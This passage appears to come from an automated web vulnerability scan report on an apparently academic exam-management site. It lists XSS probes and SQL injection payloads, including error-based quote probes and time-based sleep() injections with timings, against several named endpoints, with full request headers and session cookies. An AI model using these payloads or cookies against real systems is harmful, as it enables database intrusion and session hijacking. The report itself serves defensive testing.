Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1461

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_soal&columns[0][name]=&columns[0][orderable]=false&columns[0][search]
[regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=id_soal&columns[1][name]=&columns[1][orderable]=false&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=false&columns[2]
[data]=nama_dosen'"()%26%25<acx><ScRiPt%20>hRCV(9588)</ScRiPt>&columns[2]
[name]=&columns[2][orderable]=true&columns[2][search][regex]=false&columns[2][search]
[value]=&columns[2][searchable]=true&columns[3][data]=nama_matkul&columns[3]
[name]=&columns[3][orderable]=true&columns[3][search][regex]=false&columns[3][search]
[value]=&columns[3][searchable]=true&columns[4][data]=nama_mapel&columns[4]
[name]=&columns[4][orderable]=true&columns[4][search][regex]=false&columns[4][search]
[value]=&columns[4][searchable]=true&columns[5][data]=soal&columns[5][name]=&columns[5]
[orderable]=true&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=true&columns[6][data]=created_on&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&columns[7][data]=id_soal&columns[7][name]=&columns[7]
[orderable]=true&columns[7][search][regex]=false&columns[7][search][value]=&columns[7]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order[
0][column]=6&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/soal/data
Verified vulnerability
Details
URL encoded POST input columns[3][data] was set to nama_matkul'"()&%<acx><ScRiPt >hRCV(9625)</ScRiPt>
Request headers

38
POST /soal/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1461

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_soal&columns[0][name]=&columns[0][orderable]=false&columns[0][search]
[regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=id_soal&columns[1][name]=&columns[1][orderable]=false&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=false&columns[2]
[data]=nama_dosen&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=nama_matkul'"()%26%25<acx><ScRiPt%20>hRCV(9625)</ScRiPt>&columns[3]
[name]=&columns[3][orderable]=true&columns[3][search][regex]=false&columns[3][search]
[value]=&columns[3][searchable]=true&columns[4][data]=nama_mapel&columns[4]
[name]=&columns[4][orderable]=true&columns[4][search][regex]=false&columns[4][search]
[value]=&columns[4][searchable]=true&columns[5][data]=soal&columns[5][name]=&columns[5]
[orderable]=true&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=true&columns[6][data]=created_on&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&columns[7][data]=id_soal&columns[7][name]=&columns[7]
[orderable]=true&columns[7][search][regex]=false&columns[7][search][value]=&columns[7]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order[
0][column]=6&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0

SQL injection

Severity High
Reported by module /Scripts/PerScheme/Sql_Injection.script

Description

SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a
web application's database server.

Impact

An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve
the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data
integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then

39
be used to escalate an attack even further.

Recommendation

Use parameterized queries when dealing with SQL queries that contain user input. Parameterized queries allow the
database to understand which parts of the SQL query should be considered as user input, therefore solving SQL injection.

References

SQL Injection (SQLi) - Acunetix (https://www.acunetix.com/websitesecurity/sql-injection/)

Types of SQL Injection (SQLi) - Acunetix (https://www.acunetix.com/websitesecurity/sql-injection2/)
Prevent SQL injection vulnerabilities in PHP applications and fix them - Acunetix
(https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/)
SQL Injection - OWASP (https://www.owasp.org/index.php/SQL_Injection)
Bobby Tables: A guide to preventing SQL injection (https://bobby-tables.com/)
SQL Injection Cheet Sheets - Pentestmonkey (http://pentestmonkey.net/category/cheat-sheet/sql-injection)

Affected items

/dosen/data
Details
URL encoded POST input columns[1][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

40
POST /dosen/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1289

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_dosen&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=1'"&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_dosen&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=email&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=nama_matkul&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5][data]
[ada]=ada&columns[5][data][id_dosen]=id_dosen&columns[5][name]=&columns[5]
[orderable]=true&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=false&columns[6][data]=id_dosen&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=7&length=100&order
[0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/dosen/data
Details
URL encoded POST input columns[2][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

41
POST /dosen/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1282

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_dosen&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nip&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=1'"&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=email&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=nama_matkul&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5][data]
[ada]=ada&columns[5][data][id_dosen]=id_dosen&columns[5][name]=&columns[5]
[orderable]=true&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=false&columns[6][data]=id_dosen&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=7&length=100&order
[0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/dosen/data
Details
URL encoded POST input columns[3][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

42
POST /dosen/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1287

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_dosen&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nip&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_dosen&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=1'"&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=nama_matkul&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5][data]
[ada]=ada&columns[5][data][id_dosen]=id_dosen&columns[5][name]=&columns[5]
[orderable]=true&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=false&columns[6][data]=id_dosen&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=7&length=100&order
[0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/dosen/data
Details
URL encoded POST input columns[4][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

43
POST /dosen/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1281

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_dosen&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nip&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_dosen&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=email&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=1'"&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5][data]
[ada]=ada&columns[5][data][id_dosen]=id_dosen&columns[5][name]=&columns[5]
[orderable]=true&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=false&columns[6][data]=id_dosen&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=7&length=100&order
[0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/dosen/data
Details
URL encoded POST input columns[6][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

44
POST /dosen/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1284

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_dosen&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nip&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_dosen&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=email&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=nama_matkul&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5][data]
[ada]=ada&columns[5][data][id_dosen]=id_dosen&columns[5][name]=&columns[5]
[orderable]=true&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=false&columns[6][data]=1'"&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=7&length=100&order
[0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/hasilujian/data
Details
URL encoded POST input columns[1][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

45
POST /hasilujian/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1414

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_ujian&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=1'"&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_matkul&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=nama_dosen&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=jumlah_soal&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5]
[data]=waktu&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=true&columns[6]
[data]=tgl_mulai&columns[6][name]=&columns[6][orderable]=true&columns[6][search]
[regex]=false&columns[6][search][value]=&columns[6][searchable]=true&columns[7]
[data]=id_ujian&columns[7][name]=&columns[7][orderable]=false&columns[7][search]
[regex]=false&columns[7][search][value]=&columns[7]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=e&start=0
/hasilujian/data
Details
URL encoded POST input columns[2][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

46
POST /hasilujian/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1413

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_ujian&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nama_ujian&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=1'"&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=nama_dosen&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=jumlah_soal&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5]
[data]=waktu&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=true&columns[6]
[data]=tgl_mulai&columns[6][name]=&columns[6][orderable]=true&columns[6][search]
[regex]=false&columns[6][search][value]=&columns[6][searchable]=true&columns[7]
[data]=id_ujian&columns[7][name]=&columns[7][orderable]=false&columns[7][search]
[regex]=false&columns[7][search][value]=&columns[7]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=e&start=0
/hasilujian/data
Details
URL encoded POST input columns[3][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

47
POST /hasilujian/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1414

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_ujian&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nama_ujian&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_matkul&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=1'"&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=jumlah_soal&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5]
[data]=waktu&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=true&columns[6]
[data]=tgl_mulai&columns[6][name]=&columns[6][orderable]=true&columns[6][search]
[regex]=false&columns[6][search][value]=&columns[6][searchable]=true&columns[7]
[data]=id_ujian&columns[7][name]=&columns[7][orderable]=false&columns[7][search]
[regex]=false&columns[7][search][value]=&columns[7]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=e&start=0
/hasilujian/data
Details
URL encoded POST input columns[4][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

48
POST /hasilujian/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1413

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_ujian&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nama_ujian&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_matkul&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=nama_dosen&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=1'"&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5]
[data]=waktu&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=true&columns[6]
[data]=tgl_mulai&columns[6][name]=&columns[6][orderable]=true&columns[6][search]
[regex]=false&columns[6][search][value]=&columns[6][searchable]=true&columns[7]
[data]=id_ujian&columns[7][name]=&columns[7][orderable]=false&columns[7][search]
[regex]=false&columns[7][search][value]=&columns[7]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=e&start=0
/hasilujian/data
Details
URL encoded POST input columns[5][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

49
POST /hasilujian/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1419

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_ujian&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nama_ujian&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_matkul&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=nama_dosen&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=jumlah_soal&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5]
[data]=1'"&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=true&columns[6]
[data]=tgl_mulai&columns[6][name]=&columns[6][orderable]=true&columns[6][search]
[regex]=false&columns[6][search][value]=&columns[6][searchable]=true&columns[7]
[data]=id_ujian&columns[7][name]=&columns[7][orderable]=false&columns[7][search]
[regex]=false&columns[7][search][value]=&columns[7]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=e&start=0
/hasilujian/data
Details
URL encoded POST input columns[6][data] was set to 1'"

Error message found:

You have an error in your SQL syntax

Request headers

50
POST /hasilujian/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1415

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_ujian&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nama_ujian&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_matkul&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=nama_dosen&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=jumlah_soal&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5]
[data]=waktu&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=true&columns[6]
[data]=1'"&columns[6][name]=&columns[6][orderable]=true&columns[6][search]
[regex]=false&columns[6][search][value]=&columns[6][searchable]=true&columns[7]
[data]=id_ujian&columns[7][name]=&columns[7][orderable]=false&columns[7][search]
[regex]=false&columns[7][search][value]=&columns[7]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=e&start=0
/jurusan/data
Verified vulnerability
Details

51
URL encoded POST input columns[1][data] was set to (select(0)from(select(sleep(6)))v)/*'+
(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

Tests performed:

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
=> 15.093
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ =>
3.129
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ =>
0.086
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
=> 15.084
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ =>
6.079
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ =>
0.194
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ =>
6.139

Original value: nama_jurusan

Request headers
POST /jurusan/data HTTP/1.1

X-Requested-With: XMLHttpRequest

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 741

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

